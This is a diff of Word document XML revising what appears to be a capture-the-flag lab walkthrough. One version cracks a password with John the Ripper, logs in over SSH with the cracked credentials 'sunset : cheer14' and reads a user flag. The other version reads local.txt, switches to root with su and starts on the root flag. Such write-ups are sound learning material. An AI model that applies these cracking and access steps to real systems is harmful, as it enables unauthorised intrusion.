-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Command used:</w:t>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Output:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7370,7 +7307,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>john newpass.txt</w:t>
+        <w:t>server</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7385,20 +7322,68 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>After running the attack using the wordlist, a password was successfully cracked.</w:t>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D654188" wp14:editId="70C58F8C">
+            <wp:extent cx="5731510" cy="2800985"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="702941300" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="702941300" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2800985"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -7406,11 +7391,36 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Command:</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Retrieving User Flag</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Navigated to home directory:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7456,7 +7466,21 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>john newpass.txt --show</w:t>
+        <w:t>cd /home/server</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>ls</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7476,7 +7500,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Cracked credentials:</w:t>
+        <w:t>Found file:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7511,7 +7535,6 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7523,135 +7546,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>sunset :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> cheer14</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FE3279D" wp14:editId="39946B5E">
-            <wp:extent cx="5731510" cy="3258820"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="648711355" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="648711355" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="3258820"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Gaining Initial Access via SSH</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Using the cracked credentials, SSH access to the machine was attempted.</w:t>
+        <w:t>local.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7717,7 +7612,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>ssh sunset@172.20.10.2</w:t>
+        <w:t>cat local.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7730,6 +7625,17 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7737,7 +7643,8 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Password used:</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>User flag:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7783,7 +7690,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>cheer14</w:t>
+        <w:t>c53c08b5bf2b0801c5d0c24149826a6e</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7798,33 +7705,13 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Login was successful and a shell was obtained.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08E2C86A" wp14:editId="5536F360">
-            <wp:extent cx="5731510" cy="4118610"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="549D8F9F" wp14:editId="0EF1D9CA">
+            <wp:extent cx="5731510" cy="2858135"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="1294395650" name="Picture 1"/>
+            <wp:docPr id="909763447" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -7832,7 +7719,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1294395650" name=""/>
+                    <pic:cNvPr id="909763447" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -7844,7 +7731,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="4118610"/>
+                      <a:ext cx="5731510" cy="2858135"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -7884,11 +7771,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -7900,55 +7783,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Retrieving the User Flag</w:t>
+        <w:t>Privilege Escalation</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7968,7 +7803,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>After gaining access to the system, the home directory was explored.</w:t>
+        <w:t>The shell allowed switching to root directly.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8034,7 +7869,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>ls -all</w:t>
+        <w:t>su root</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8054,7 +7889,27 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>A file named:</w:t>
+        <w:t>Successfully escalated privileges.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Verification:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8100,7 +7955,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>user.txt</w:t>
+        <w:t>whoami</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8120,27 +7975,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>was found.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Command:</w:t>
+        <w:t>Output:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8186,7 +8021,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>cat user.txt</w:t>
+        <w:t>root</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8201,12 +8036,106 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>User flag:</w:t>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D541F0A" wp14:editId="1144121B">
+            <wp:extent cx="5731510" cy="2529840"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
+            <wp:docPr id="680771445" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="680771445" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2529840"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Retrieving Root Flag</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Navigate to root directory:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8252,7 +8181,21 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>5b5b8e9b01ef27a1cc0a2d5fa87d7190</w:t>
+        <w:t>cd /root</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>ls</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8267,174 +8210,12 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58250B07" wp14:editId="2024E190">
-            <wp:extent cx="5038095" cy="2142857"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="311733621" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
